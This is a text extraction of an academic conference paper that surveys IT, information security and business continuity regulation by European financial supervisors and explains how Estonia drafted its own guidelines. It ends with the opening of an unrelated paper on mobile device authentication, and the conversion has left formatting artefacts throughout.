Keywords: <strong>in</strong>formation technology, <strong>in</strong>formation security, bus<strong>in</strong>ess cont<strong>in</strong>uity, compliance assessment, f<strong>in</strong>ancial<br />
sector<br />
1. Introduction<br />
The survey described <strong>in</strong> this paper is a part of bigger research called “A Method for Cont<strong>in</strong>uous<br />
Information Technology Supervision: The Case of the Estonian F<strong>in</strong>ancial Sector”. In the <strong>in</strong>troduction, I<br />
give an overview about the whole study so that reader can easily understand the content and purpose of<br />
survey presented below.<br />
Literature review presented dur<strong>in</strong>g the research shows the number of theories, solutions,<br />
recommendations, best practices and standards <strong>in</strong> connection with <strong>in</strong>formation technology and<br />
<strong>in</strong>formation security. For example, COBIT (ISACA, 2010), SABSA (2010), COSO (2010), CMM (1993),<br />
GAIT (Institute of Internal Auditors, 2010), OCTAVE (CMU/SEI, 1999) etc. The questions and topics are<br />
highlighted and relevant examples from different studies are presented, and afterwards, through the<br />
steps of research, our own approach is presented to deal with the problems and topics. From scientific<br />
po<strong>in</strong>t of view, author sees too little attention to us<strong>in</strong>g exist<strong>in</strong>g knowledge for certa<strong>in</strong> task and comb<strong>in</strong><strong>in</strong>g<br />
different approaches to produce new ones.<br />
Next, IT supervision approach is discussed with the purpose to highlight the features <strong>in</strong> this area. An<br />
overview about IT supervision activities, it is off-site and on-site activities are highlighted. The tendency<br />
shows that systematic approach is needed for IT supervision. New IT supervision method will be<br />
proposed to support the off-site <strong>in</strong>spections and should give possibilities to enter the results for on-site<br />
<strong>in</strong>spections.<br />
298
Andro Kull<br />
To go further, IT risks are enlighten<strong>in</strong>g more detail from supervisory perspective and there are some<br />
differences with traditional IT risk approach. Supervision divides two pr<strong>in</strong>ciple risk sites: risks before<br />
control and risk controls. Concrete risk scales are described and presented.<br />
The research cont<strong>in</strong>ues with requirements to reduce the level of risk. First the process of work<strong>in</strong>g out the<br />
advisory guidel<strong>in</strong>es is described and the guidel<strong>in</strong>es <strong>in</strong> connection with IT field are drawn up us<strong>in</strong>g the key<br />
concept, i.e. for IT governance, <strong>in</strong>formation security and bus<strong>in</strong>ess cont<strong>in</strong>uity. To conclude with the<br />
requirements, a common approach <strong>in</strong> European level is surveyed and the ma<strong>in</strong> results of this survey are<br />
po<strong>in</strong>ted.<br />
To motivate the importance of produc<strong>in</strong>g the field regulations, a lot of arguments may be highlighted.<br />
First, advisory guidel<strong>in</strong>es are the ma<strong>in</strong> tool to enforce supervised entities’ duties to ensure secure<br />
operations and for supervisors <strong>in</strong> conduct<strong>in</strong>g IT supervision activities. Also, consider<strong>in</strong>g the connections<br />
with European level – European Union membership, Euro, parent banks from Europe, the same high<br />
level approaches (for example Basel II), the local requirements should conform with the general practice.<br />
The research cont<strong>in</strong>ues with analysis how the stated requirements may <strong>in</strong>fluence the supervised entities<br />
and determ<strong>in</strong><strong>in</strong>g the criteria for requirements. To deal with possible costs for <strong>in</strong>itiatives to conform to<br />
supervisory requirements, the supervised entities were studied about how they today conform to<br />
requirements and is there a large gap between exist<strong>in</strong>g and required measures. As a conclusion we have<br />
got some confidence that the requirements stated before are not too burdensome for supervised entities<br />
and <strong>in</strong> general, the ma<strong>in</strong> activities are carried out to meet the requirements.<br />
The study proceeds with f<strong>in</strong>d<strong>in</strong>g out the criteria to meet the requirements. The first version of relevant<br />
handbook is compiled and this handbook has to be a subject of cont<strong>in</strong>uous improvements consider<strong>in</strong>g the<br />
real assessments, the f<strong>in</strong>ancial sector changes, etc. Compliance criteria and weight<strong>in</strong>g help to answer the<br />
question of what k<strong>in</strong>ds of criteria should be used to ensure compliance with requirements and how to<br />
assure equal treatment of market participants. The criteria handbook is the most valuable outcome of the<br />
whole research.<br />
The research proceeds with scor<strong>in</strong>g issues based on the requirements and criteria stated beforehand.<br />
Some widely known security assessment approaches are described and possible measures and metrics<br />
are studied. Us<strong>in</strong>g this knowledge, the scor<strong>in</strong>g scale for IT supervision is proposed and a real use case is<br />
conducted. This is the first attempt to check applicability of criteria handbook <strong>in</strong> practice.<br />
The research cont<strong>in</strong>ues with determ<strong>in</strong><strong>in</strong>g the systematic approach for mak<strong>in</strong>g assessment. We give an<br />
overview about the attempt to realize the IT supervision approach <strong>in</strong> appropriate IT solution. The need for<br />
IT solution to deal systematically with compliance assessment is expla<strong>in</strong>ed and a pre-analysis of<br />
expected solution is proposed follow<strong>in</strong>g the context description and functional and non-functional<br />
requirements analysis. The basics are outl<strong>in</strong>ed to create IT solution for compliance scor<strong>in</strong>g.<br />
The research proceeds with summation of previous results and putt<strong>in</strong>g together method, i.e. all the<br />
pieces studied beforehand for cont<strong>in</strong>uous <strong>in</strong>formation technology supervision. Once the method is<br />
implemented <strong>in</strong> practice, further exam<strong>in</strong>ation beg<strong>in</strong>s to determ<strong>in</strong>e those entities with good compliance<br />
with IT requirements and are they experienc<strong>in</strong>g lower level losses <strong>in</strong> the case of IT <strong>in</strong>cidents. Based on<br />
that exam<strong>in</strong>ation the reasons will be explored, if it is not true, and next, the method will be improved. The<br />
ma<strong>in</strong> purpose of research – systematically exam<strong>in</strong>e the core content of IT supervision – is achieved and<br />
the ma<strong>in</strong> result – an IT supervision method – will be implemented <strong>in</strong>to everyday supervision work.<br />
2. European supervision<br />
“Requirements for IT <strong>in</strong> European supervision authorities” study helps to answer the question of what<br />
requirements are reasonable to ensure security and which of them are obligatory.<br />
Research question was - how European f<strong>in</strong>ancial supervision authorities regulate the IT area?<br />
Next, description of the study of requirements <strong>in</strong> the IT area <strong>in</strong> European countries’ supervision<br />
authorities follows.<br />
299
2.1 Research model<br />
Andro Kull<br />
The idea considered throughout the study is to comb<strong>in</strong>e all sufficient best practices and <strong>in</strong>ternational<br />
standards, use the set for build<strong>in</strong>g appropriate method for IT supervision and apply it for Estonian<br />
f<strong>in</strong>ancial sector. The key concept presented <strong>in</strong> Figure 2.1 and used through the research is named as<br />
technology assurance; it is all which gives the feel of security <strong>in</strong> us<strong>in</strong>g technology. This may be a<br />
synonym for the world <strong>in</strong>formation assurance (IA).<br />
To ensure technology assurance, the lowest steps have to be passed to go higher level. Technology<br />
assurance presumes that bus<strong>in</strong>ess processes are well organized, <strong>in</strong>formation assets and IT governance<br />
has to be well established etc to build up higher level assurance like work<strong>in</strong>g bus<strong>in</strong>ess cont<strong>in</strong>uity process.<br />
COMPLIANCE ASSESSMENT<br />
Internal requirements, external requirements, compliance criteria,<br />
compliance assessment, compliance monitor<strong>in</strong>g<br />
IT AUDITING<br />
<strong>Security</strong> audit, IT project audit, system audit, technology audit<br />
BUSINESS CONTINUITY<br />
Bus<strong>in</strong>ess cont<strong>in</strong>uity plann<strong>in</strong>g, recovery plann<strong>in</strong>g, recovery test<strong>in</strong>g<br />
INFORMATION SECURITY<br />
Information security management, IT security measures<br />
IT RISK MANAGEMENT<br />
Bus<strong>in</strong>ess risks, IT risk assessment, measures for risk mitigation<br />
IT GOVERNANCE<br />
IT strategy, IT management, IT organization, outsourc<strong>in</strong>g, IT<br />
development, IT ma<strong>in</strong>tenance<br />
INFORMATION ASSETS<br />
Identify<strong>in</strong>g all critical and important <strong>in</strong>formation assets, responsibilities<br />
BUSINESS PROCESSES<br />
CRITICAL INFRASTRUCTURE PROTECTION<br />
Figure1: Elements of IT assurance<br />
A study on how European supervision authorities regulate the IT area was conducted <strong>in</strong> August 2008. 27<br />
European Union countries, Norway and Croatia were surveyed.<br />
The study method was systematic review of collected documentation. The review was organized <strong>in</strong> such<br />
a way that all relevant keywords were accounted and if there was a description <strong>in</strong> connection with certa<strong>in</strong><br />
keyword, that fact was noted. The keywords are proposed as what areas <strong>in</strong> connection with IT may be<br />
important to regulate and also the keywords of the key concept where the focus. In sett<strong>in</strong>g up the<br />
keywords, the IT field was divided <strong>in</strong>to three parts – IT governance, <strong>in</strong>formation security and bus<strong>in</strong>ess<br />
cont<strong>in</strong>uity and lower-lever topics.<br />
2.2 Data gather<strong>in</strong>g<br />
The <strong>in</strong>formation and materials about the requirements were researched <strong>in</strong> relevant web-pages and a<br />
simple keyword search gave results, i.e. the regulative documents for only one third of the countries.<br />
Consider<strong>in</strong>g the poor results of web search, an e-mail was compiled with the generic e-mail addresses of<br />
the supervision authorities. The e-mail conta<strong>in</strong>ed the follow<strong>in</strong>g request:<br />
300
Andro Kull<br />
“I am writ<strong>in</strong>g to you on behalf of the Estonian F<strong>in</strong>ancial Supervision Authority, where I am responsible for<br />
IT field supervision. S<strong>in</strong>ce we are conduct<strong>in</strong>g a small survey regard<strong>in</strong>g what k<strong>in</strong>d of requirements are <strong>in</strong><br />
place for the IT field <strong>in</strong> the f<strong>in</strong>ancial sector throughout European Union Member States, we have already<br />
exam<strong>in</strong>ed your web-sites, but we have been unable to locate clear documents or l<strong>in</strong>ks to the relevant<br />
<strong>in</strong>formation. We are <strong>in</strong>terested <strong>in</strong> the whole f<strong>in</strong>ancial sector (bank<strong>in</strong>g, <strong>in</strong>surance, etc.) and we are<br />
cover<strong>in</strong>g the ma<strong>in</strong> components of IT (IT governance, <strong>in</strong>formation security, bus<strong>in</strong>ess cont<strong>in</strong>uity). The<br />
results of this survey will be used for the improvement of our regulations <strong>in</strong> the IT field of supervised<br />
entities.<br />
Consider<strong>in</strong>g the <strong>in</strong>formation above, please give a short answer to the follow<strong>in</strong>g questions:<br />
What k<strong>in</strong>ds of regulations conta<strong>in</strong> requirements for the IT field of supervised entities <strong>in</strong> your country?<br />
Are these regulations freely available via the Internet?<br />
If so, is it possible to provide the exact l<strong>in</strong>k to the adequate <strong>in</strong>formation?<br />
If not, is it possible to send the relevant files via e-mail?<br />
In case the relevant <strong>in</strong>formation is only for <strong>in</strong>ternal use, could you please describe what are the<br />
common demands for the IT field of supervised entities?”<br />
Responses were received to about one half of the sent e-mails, account<strong>in</strong>g for another one third of the<br />
participat<strong>in</strong>g countries. The other third of the countries did not answer the e-mail and keyword-searches<br />
also failed to provide a result, so there is no <strong>in</strong>formation about do these countries regard<strong>in</strong>g whether they<br />
have established IT requirements or not and what k<strong>in</strong>d of requirements they may be. The results of the<br />
study are composed based on two thirds of the participat<strong>in</strong>g countries and the author considers it<br />
adequate enough to make reasonable conclusions.<br />
2.3 Data analysis<br />
Categories and statistics about different areas are illustrated with next three figures follow<strong>in</strong>g the ma<strong>in</strong><br />
themes.<br />
20<br />
18<br />
16<br />
14<br />
12<br />
10<br />
8<br />
6<br />
4<br />
2<br />
0<br />
Information architecture<br />
IT organization<br />
IT strategy<br />
IT risk management<br />
IT Governance<br />
IT development<br />
Change management<br />
IT outsourc<strong>in</strong>g<br />
Problem management<br />
Monitor<strong>in</strong>g<br />
Figure 2: Summary of study of European supervision – IT governance<br />
Information architecture is mentioned only by two countries. It is not surpris<strong>in</strong>g because the decisions<br />
about <strong>in</strong>frastructure should ma<strong>in</strong>ly depend on bus<strong>in</strong>ess needs. Still it may be important to supervisors too<br />
because the possibility to reach the end location of data and systems.<br />
IT organization, certa<strong>in</strong>ly, should be appropriate; segregation of duties has to be ma<strong>in</strong>ta<strong>in</strong>ed etc.<br />
IT strategy could be valuable source to detect which developments are planned and consider the<br />
possible risks beforehand.<br />
301
Andro Kull<br />
IT risk management is the most marked po<strong>in</strong>t and means that majority of supervised entities require the<br />
subjects themselves carry out the risk assessments and decide about the appropriate measures. Still, a<br />
supervisory risk will position next to it.<br />
IT development should take <strong>in</strong>to account and the <strong>in</strong>formation security needs like for example system<br />
controls, logg<strong>in</strong>g of operations etc. have to be implemented.<br />
Change management seems to be more and more important as the systems functionality and data loads<br />
grow.<br />
IT outsourc<strong>in</strong>g is certa<strong>in</strong>ly one possible source of risks and outsourc<strong>in</strong>g partners have to <strong>in</strong> supervisors<br />
focus.<br />
Problem management is a corrective measure and it goes with the <strong>in</strong>cident management.<br />
Monitor<strong>in</strong>g is detective measure. It is right to presume that supervised entities have implemented<br />
procedures and systems to detect deviations from normal function<strong>in</strong>g.<br />
As a conclusion for IT governance topics, a lot of attention is paid to the IT risk management, outsourc<strong>in</strong>g<br />
and monitor<strong>in</strong>g. Less attention is paid to the <strong>in</strong>formation architecture and this <strong>in</strong>dicates that the<br />
architecture is to decide on the competence of supervised entities.<br />
16<br />
14<br />
12<br />
10<br />
8<br />
6<br />
4<br />
2<br />
0<br />
<strong>Security</strong> policy<br />
<strong>Security</strong> organization structure<br />
IT <strong>Security</strong> Governance<br />
Asset classification<br />
Physical <strong>Security</strong><br />
Communications security<br />
Access Control Management<br />
Figure 3: Summary of study of European supervision –IT <strong>Security</strong> governance<br />
<strong>Security</strong> policy should clearly reflect the needs for <strong>in</strong>formation security and objectives, also the roles and<br />
responsibilities.<br />
<strong>Security</strong> organization establishment may be a subject for consideration if it is absolutely necessary for<br />
each, i.e. for bigger banks and for smaller <strong>in</strong>vestment firms. In any case, there should be confirmed clear<br />
responsibility for <strong>in</strong>formation security issues.<br />
Asset classification is not <strong>in</strong> many cases regulated and the reason could be that f<strong>in</strong>ancial <strong>in</strong>formation and<br />
personal data is sensitive by default and needs to be protected.<br />
Physical security measures are mentioned by half of the cases. Here may be the possibility to l<strong>in</strong>k with<br />
other standards, for example, to build a server room.<br />
302
Andro Kull<br />
Communications security seems to be a grow<strong>in</strong>g area and more tight regulation can be expected over<br />
time.<br />
Access control management is quite well regulated. Access management is also direct l<strong>in</strong>k between<br />
bus<strong>in</strong>ess and IT and all the categories of <strong>in</strong>formation security measures should be accounted – physical,<br />
organizational and technical.<br />
As a conclusion for <strong>in</strong>formation security governance, a lot of attention is paid to the <strong>in</strong>formation security<br />
policy and access control management. Less attention is paid to <strong>in</strong>formation security organization and<br />
<strong>in</strong>formation assets classification.<br />
18<br />
16<br />
14<br />
12<br />
10<br />
8<br />
6<br />
4<br />
2<br />
0<br />
Bus<strong>in</strong>ess cont<strong>in</strong>uity<br />
process<br />
Bus<strong>in</strong>ess cont<strong>in</strong>uity<br />
Bus<strong>in</strong>ess cont<strong>in</strong>uity plan Bus<strong>in</strong>ess cont<strong>in</strong>uity test<strong>in</strong>g<br />
Figure 4: Summary of study of European supervision – bus<strong>in</strong>ess cont<strong>in</strong>uity<br />
Bus<strong>in</strong>ess cont<strong>in</strong>uity process is required <strong>in</strong> most cases. Bus<strong>in</strong>ess cont<strong>in</strong>uity plans are required <strong>in</strong> most<br />
cases and test<strong>in</strong>g of bus<strong>in</strong>ess cont<strong>in</strong>uity plan is needed about half the cases. However, the existence of<br />
such a plan does not guarantee if it is work<strong>in</strong>g or not and bus<strong>in</strong>ess cont<strong>in</strong>uity test<strong>in</strong>g seems to be<br />
obvious.<br />
Bus<strong>in</strong>ess cont<strong>in</strong>uity regulation follows certa<strong>in</strong> logic and it starts with requirements for process and<br />
cont<strong>in</strong>ues with plann<strong>in</strong>g and test<strong>in</strong>g as the outcomes of this process.<br />
2.4 Conclusion<br />
As a first conclusion, eight countries have a rather high level of regulation, five countries have mid-level<br />
regulation and n<strong>in</strong>e countries have a low-level of <strong>in</strong>formation technology regulation. There is no<br />
<strong>in</strong>formation about six of the countries, and one of respondents announced that they do not have specific<br />
regulations for <strong>in</strong>formation technology. As next conclusion, there is remarkable difference about the<br />
strength of regulation between countries <strong>in</strong> connection with IT field regulations. In addition to “must” and<br />
“shall” usage difference, also the levels of regulation vary from guidel<strong>in</strong>es to acts.<br />
A common conclusion is that all the ma<strong>in</strong> areas and categories are somehow covered mean<strong>in</strong>g classic<br />
<strong>in</strong>formation security. To illustrate the idea, Table 2.1 is presented.<br />
For example, a measure “access control management” as stated by guidel<strong>in</strong>es is a preventive measure<br />
and may be solved through organizational, technical and physical activities. While a measure<br />
“monitor<strong>in</strong>g” is a detective and mostly is solved through implementation of technical processes.<br />
303
Andro Kull<br />
Presented classic <strong>in</strong>formation security matrix is a useful evaluation tool to consider that all areas and<br />
categories are taken <strong>in</strong>to account <strong>in</strong> conclud<strong>in</strong>g with requirements.<br />
Table 1: Categories of <strong>in</strong>formation security measures<br />
Preventive measures Detective measures Corrective measures<br />
Organizational measures<br />
X<br />
X<br />
X<br />
Technical measures<br />
Physical measures<br />
X<br />
X<br />
The results of the study, about how the IT field is regulated <strong>in</strong> European countries, could be used further<br />
as follows:<br />
In sett<strong>in</strong>g up the requirements for <strong>in</strong>formation security <strong>in</strong> Estonia, we consider ma<strong>in</strong>ly excellent<br />
examples such as Greece, F<strong>in</strong>land, Slovakia, the Netherlands and Latvia;<br />
Later, when analyz<strong>in</strong>g all of the requirements and po<strong>in</strong>t<strong>in</strong>g out the criteria for assessment, we can<br />
use as a comparison descriptions of those requirements which are handled thoroughly.<br />
Go<strong>in</strong>g forward, the real circumstances will be considered. Estonia had two regulations for IT field <strong>in</strong><br />
f<strong>in</strong>ancial sector and they were developed for IT governance and bus<strong>in</strong>ess cont<strong>in</strong>uity. After the survey,<br />
immediately arose a need for additional regulation for <strong>in</strong>formation security.<br />
3. Estonian supervision<br />
The results of survey among European f<strong>in</strong>ancial supervision authorities gave some impacts for<br />
complet<strong>in</strong>g Estonian regulative guidel<strong>in</strong>es for <strong>in</strong>formation security field.<br />
3.1 Advisory guidel<strong>in</strong>es process<br />
The <strong>in</strong>itiative for creat<strong>in</strong>g advisory guidel<strong>in</strong>es comes from Estonian F<strong>in</strong>ancial Supervision Authority<br />
(EFSA) to more precisely regulate the areas important for stability of market.<br />
There is a need for more concrete regulation for market. First, it helps subjects to set up their own<br />
specific <strong>in</strong>ternal regulations and second, it helps to expla<strong>in</strong> the importance of IT and <strong>in</strong>formation security<br />
measures and the need for <strong>in</strong>vestments for implement<strong>in</strong>g the measures.<br />
After the first version of guidel<strong>in</strong>es they are under discussion <strong>in</strong>side of FSA. After that it comes to the<br />
market participants for comments. Consider<strong>in</strong>g the feedback, next versions will be developed and<br />
discussed. After common consensus the next version, the guidel<strong>in</strong>es will be published.<br />
Generally the next version which comes to establishment will be <strong>in</strong>troduced to all <strong>in</strong>terested parties <strong>in</strong><br />
relevant sem<strong>in</strong>ar.<br />
Between development and establishment of guidel<strong>in</strong>es an adequate time buffer will be left, so the<br />
subjects can complete the actions to be <strong>in</strong> compliance with new regulations.<br />
3.2 F<strong>in</strong>ancial Supervision Authority<br />
Estonian F<strong>in</strong>ancial Supervision Authority’s objectives of f<strong>in</strong>ancial supervision (2010) states that: “The<br />
ma<strong>in</strong> objective of supervision is to ensure that f<strong>in</strong>ancial <strong>in</strong>stitutions are able to meet their obligations to<br />
the customers <strong>in</strong> the future - pay out deposits, <strong>in</strong>surance losses or pension contributions, etc. An<br />
important task of the F<strong>in</strong>ancial Supervision Authority is also to help to <strong>in</strong>crease the efficiency of the<br />
Estonian f<strong>in</strong>ancial sector, avoid systemic risks, and prevent the abuse of the f<strong>in</strong>ancial sector for crim<strong>in</strong>al<br />
purposes. The work of the Authority also <strong>in</strong>volves explanation of which are the risks for the customers<br />
and provide <strong>in</strong>formation and support to them <strong>in</strong> choos<strong>in</strong>g f<strong>in</strong>ancial services.”<br />
This statement gives the first <strong>in</strong>dicatives that risk assessment and management should be implemented<br />
<strong>in</strong>to f<strong>in</strong>ancial <strong>in</strong>stitutions everyday bus<strong>in</strong>ess.<br />
304<br />
X<br />
X<br />
X<br />
X
3.3 Credit Institutions Act<br />
Andro Kull<br />
The <strong>in</strong>itiative of creat<strong>in</strong>g more precise requirements to regulate IT <strong>in</strong> f<strong>in</strong>ancial sector comes, for example,<br />
from credit <strong>in</strong>stitutions act by follow<strong>in</strong>g statements:<br />
“All data and assessments which are known to a credit <strong>in</strong>stitution concern<strong>in</strong>g of the clients of the credit<br />
<strong>in</strong>stitution or other credit <strong>in</strong>stitutions are deemed to be <strong>in</strong>formation subject to bank<strong>in</strong>g secrecy.<br />
The managers and employees of a credit <strong>in</strong>stitution and other persons who have access to <strong>in</strong>formation<br />
subject to bank<strong>in</strong>g secrecy are required to process the data which is subject to bank<strong>in</strong>g secrecy <strong>in</strong><br />
conformity to the Personal Data Protection Act and ma<strong>in</strong>ta<strong>in</strong> the confidentiality of such <strong>in</strong>formation<br />
<strong>in</strong>def<strong>in</strong>itely, unless otherwise provided for <strong>in</strong> this Act.”<br />
Guidel<strong>in</strong>es must cover the most important fields stated <strong>in</strong> act and also <strong>in</strong> key concept – IT governance,<br />
<strong>in</strong>formation security and bus<strong>in</strong>ess cont<strong>in</strong>uity.<br />
For IT governance § 131 section 6 states „In order to apply for authorization, the members of the<br />
management board entered <strong>in</strong> the memorandum of association or registry card of the company be<strong>in</strong>g<br />
founded or operat<strong>in</strong>g (here<strong>in</strong>after applicant) shall submit a written application and the follow<strong>in</strong>g<br />
documents and <strong>in</strong>formation and other technological means and systems, security systems, control<br />
mechanisms and systems needed for provision of the planned f<strong>in</strong>ancial services“.<br />
§ 55 section 8 „Among other obligations, the management board is required to ensure the existence and<br />
function<strong>in</strong>g of systems to guarantee that <strong>in</strong>formation necessary for employees of the credit <strong>in</strong>stitution to<br />
perform their duties is communicated thereto <strong>in</strong> a timely manner;“<br />
For <strong>in</strong>formation security § 55 section 9 states „Among other obligations, the management board is<br />
required to ensure the safety and regular monitor<strong>in</strong>g of <strong>in</strong>formation technology systems used by the credit<br />
<strong>in</strong>stitution and systems used for the safekeep<strong>in</strong>g of assets of clients.”<br />
For bus<strong>in</strong>ess cont<strong>in</strong>uity § 82 section 3 states: „A credit <strong>in</strong>stitution must prepare and apply operational<br />
constancy plans <strong>in</strong> order to guarantee the restoration and cont<strong>in</strong>uity of bus<strong>in</strong>ess activities <strong>in</strong> the part of all<br />
essential bus<strong>in</strong>ess processes.“<br />
3.4 EFSA guidel<strong>in</strong>es<br />
Although legislative requirements are not precise, these statements give an <strong>in</strong>dication which areas have<br />
to be under consideration. In supervision mean<strong>in</strong>g, the requirements from legislation have to be filled with<br />
content. It gives a basis for development and implementation guidel<strong>in</strong>es of F<strong>in</strong>ancial Supervision<br />
Authority <strong>in</strong> <strong>in</strong>formation technology areas, which are freely available:<br />
Requirements for the organization the field of <strong>in</strong>formation technology (2010);<br />
Requirements for the organization of the field of <strong>in</strong>formation security (2010);<br />
Requirements for organiz<strong>in</strong>g the bus<strong>in</strong>ess cont<strong>in</strong>uity process of supervised entities (2010).<br />
The ma<strong>in</strong> practical outcome for Estonia of survey<strong>in</strong>g European supervision requirements was the<br />
<strong>in</strong>dication to change two exist<strong>in</strong>g guidel<strong>in</strong>es, i.e. requirements for the organization the field of <strong>in</strong>formation<br />
technology and requirements for organiz<strong>in</strong>g the bus<strong>in</strong>ess cont<strong>in</strong>uity process and create one new, i.e.<br />
requirements for the organization of the field of <strong>in</strong>formation security. It is true that guidel<strong>in</strong>es give mostly<br />
assurance for <strong>in</strong>herent risks <strong>in</strong> f<strong>in</strong>ancial sector. For example, it is stated that there should be a<br />
responsible person for <strong>in</strong>formation security and it is unclear for what concrete risks will be mitigated.<br />
However, the guidel<strong>in</strong>es are important to provide the basis for expectations of the supervision authority<br />
and for obligations of the supervised entity. In this light, it is obvious that to assess the compliance with<br />
these requirements and to monitor real risks, more detailed supervision approach is needed. Research<br />
goes further to develop appropriate criteria handbook and assessment solutions for these purposes.<br />
4. Discussion<br />
Next some common f<strong>in</strong>d<strong>in</strong>gs, lessons learned and proposals are discussed. First, the proposed key<br />
concept seems work<strong>in</strong>g, it means the common understand<strong>in</strong>g <strong>in</strong> European level for regulations <strong>in</strong><br />
f<strong>in</strong>ancial sector and IT field revolve around the given keywords.<br />
305
Andro Kull<br />
Risk assessment was mentioned <strong>in</strong> survey as the most critical issue to regulate. The follow<strong>in</strong>g questions<br />
rise <strong>in</strong> case the risk assessments by supervised entities and risk assessment by supervision authority<br />
mismatch. To address such problems, the higher level risk management approaches are proposed like<br />
Basel II and Solvency II. Named approaches deal with risk pric<strong>in</strong>g and respective capital requirements.<br />
One general question through the survey and supervision authority guidel<strong>in</strong>es process was about the<br />
mandate of regulative guidel<strong>in</strong>es. Some European countries use “must”, the others use softer formulation<br />
“shall”. Estonia decided to use “shall” form because of the range of the guidel<strong>in</strong>es which covers bigger<br />
banks and also small <strong>in</strong>vestment firms.<br />
Connected question is the mandate of guidel<strong>in</strong>es document – it is not a law, which is mandatory and it is<br />
not a standard which is optional. Estonian approach is between of them and uses term “”comply or<br />
expla<strong>in</strong>”. The “comply or expla<strong>in</strong>” pr<strong>in</strong>ciple should be taken <strong>in</strong>to account <strong>in</strong> the application of these<br />
guidel<strong>in</strong>es: if necessary, a supervised entity shall be able to expla<strong>in</strong> why it is not apply<strong>in</strong>g or is only partly<br />
apply<strong>in</strong>g any of the paragraphs of these guidel<strong>in</strong>es. Also tim<strong>in</strong>g of regulations is an discussion po<strong>in</strong>t. As<br />
the new threats occur, the requirements may change and the question is what the right time for these<br />
changes is. The possibilities may vary from long time period before and long time after. One example of<br />
such new trends is security <strong>in</strong> cloud comput<strong>in</strong>g. The recommendations from ENISA (2011, p. 9) applied<br />
for governments <strong>in</strong>dicate the need for additional risk assessment <strong>in</strong> us<strong>in</strong>g cloud comput<strong>in</strong>g technologies<br />
for critical <strong>in</strong>formation <strong>in</strong>frastructure. In Estonia, for example electronic bank<strong>in</strong>g is considered as essential<br />
services and these are regulated by Emergency act (Estonian M<strong>in</strong>istry of the Interior, 2009).<br />
As a wider conclusion, the regulations are to be a subject of cont<strong>in</strong>uous review and improvement.<br />
Consider<strong>in</strong>g the whole research, one may ask if such complicated assessment approach is reasonable to<br />
develop and implement if there are many alternatives to assess the subjects, for example CMM (2010)<br />
nam<strong>in</strong>g one of the best known? The answer, which opens up the whole essence of the research and<br />
solution for IT supervision <strong>in</strong> and is that we do not need to score the enterprises <strong>in</strong> f<strong>in</strong>ancial sector, but<br />
f<strong>in</strong>d out the most critical risk areas connected with IT <strong>in</strong>side of supervised entities.<br />
In implement<strong>in</strong>g IT supervision method, as described above, <strong>in</strong>to practice, the proposal is more to<br />
consider with external risks and try to cont<strong>in</strong>uously <strong>in</strong>tegrate them <strong>in</strong>to the method.<br />
References<br />
Carnegie Mellon Software Eng<strong>in</strong>eer<strong>in</strong>g Institute (CMU/SEI) (1999) OCTAVE - Operationally Critical Threat, Asset,<br />
and Vulnerability Evaluation Framework. Technical report, CMU/SEI-99-TR-017, ESC-TR-99-017.<br />
Committee of Sponsor<strong>in</strong>g Organizations (COSO) (2010) COSO framework. http://www.coso.org. Accessed at<br />
10.08.2010.<br />
Estonian F<strong>in</strong>ancial Supervision Authority (2010) Objective of F<strong>in</strong>ancial Supervision, [onl<strong>in</strong>e],<br />
http://www.fi.ee/<strong>in</strong>dex.php?id=580. Accessed at 26.04.2011.<br />
Estonian F<strong>in</strong>ancial Supervision Authority (2010) Requirements for Organiz<strong>in</strong>g the Bus<strong>in</strong>ess Cont<strong>in</strong>uity Process of<br />
Supervised Entities, [onl<strong>in</strong>e], http://www.fi.ee/failid/Bus<strong>in</strong>ess_cont<strong>in</strong>uity.pdf. Accessed at 26.04.2011.<br />
Estonian F<strong>in</strong>ancial Supervision Authority (2010) Requirements for the organization of the field of <strong>in</strong>formation security,<br />
[onl<strong>in</strong>e], http://www.fi.ee/failid/<strong>in</strong>formation_security.pdf. Accessed at 26.04.2011.<br />
Estonian F<strong>in</strong>ancial Supervision Authority (2010) Requirements for the organization the field of <strong>in</strong>formation<br />
technology, [onl<strong>in</strong>e], http://www.fi.ee/failid/IT_governance.pdf. Accessed at 26.04.2011.<br />
Estonian M<strong>in</strong>istry of the Interior (2009) Emergency Act, [onl<strong>in</strong>e],<br />
http://www.legaltext.ee/et/andmebaas/tekst.asp?loc=text&dok=XXXXX26&keel=en&pg=1&ptyyp=RT&tyyp=X&q<br />
uery=h%E4daolukorra. Accessed at 26.04.2011.<br />
European Network and Information <strong>Security</strong> Agency (2010) <strong>Security</strong> & Resilience <strong>in</strong> Governmental Clouds, Mak<strong>in</strong>g<br />
an <strong>in</strong>formed decision, [onl<strong>in</strong>e], http://www.enisa.europa.eu/act/rm/emerg<strong>in</strong>g-and-futurerisk/deliverables/security-and-resilience-<strong>in</strong>-governmental-clouds/at_download/fullReport.<br />
Accessed at<br />
27.01.2011.<br />
Institute of Internal Auditors (2010) GAIT - A risk-based approach to assess<strong>in</strong>g the scope of IT General Controls.<br />
[onl<strong>in</strong>e]. http://www.theiia.org/guidance/standards-and-guidance/ippf/practice-guides/gait/. Accessed at<br />
21.06.2010.<br />
ISACA (2010) COBIT - Control Objectives for Information and related Technology. https://www.isaca.org/. Accessed<br />
at 29.03.2010.<br />
SABSA (2010) SABSA - Sherwood Applied Bus<strong>in</strong>ess <strong>Security</strong> Architecture. http://www.sabsa.org/. Accessed at<br />
17.08.2010.<br />
Software Eng<strong>in</strong>eer<strong>in</strong>g Institute (1993) CMM – Capability Maturity Model, [onl<strong>in</strong>e], http://www.sei.cmu.edu/<strong>in</strong>dex.cfm.<br />
Accessed at 18.07.2010.<br />
306
Behaviour Profil<strong>in</strong>g for Transparent Authentication for Mobile<br />
Devices<br />
Fudong Li 1 , Nathan Clarke 1, 2 , Maria Papadaki 1 and Paul Dowland 1<br />
1<br />
University of Plymouth, UK<br />
2<br />
Edith Cowan University, Perth, Western Australia<br />
<strong>in</strong>fo@cscan.org<br />
Abstract: S<strong>in</strong>ce the first handheld cellular phone was <strong>in</strong>troduced <strong>in</strong> 1970s, the mobile phone has changed<br />
significantly both <strong>in</strong> terms of popularity and functionality. With more than 4.6 billion subscribers around the world, it<br />
has become a ubiquitous device <strong>in</strong> our daily life. Apart from the traditional telephony and text messag<strong>in</strong>g services,<br />
people are enjoy<strong>in</strong>g a much wider range of mobile services over a variety of network connections <strong>in</strong> the form of<br />
mobile applications. Although a number of security mechanisms such as authentication, antivirus, and firewall<br />
applications are available, it is still difficult to keep up with various mobile threats (i.e. service fraud, mobile malware<br />
and SMS phish<strong>in</strong>g); hence, additional security measures should be taken <strong>in</strong>to consideration. This paper proposes a<br />
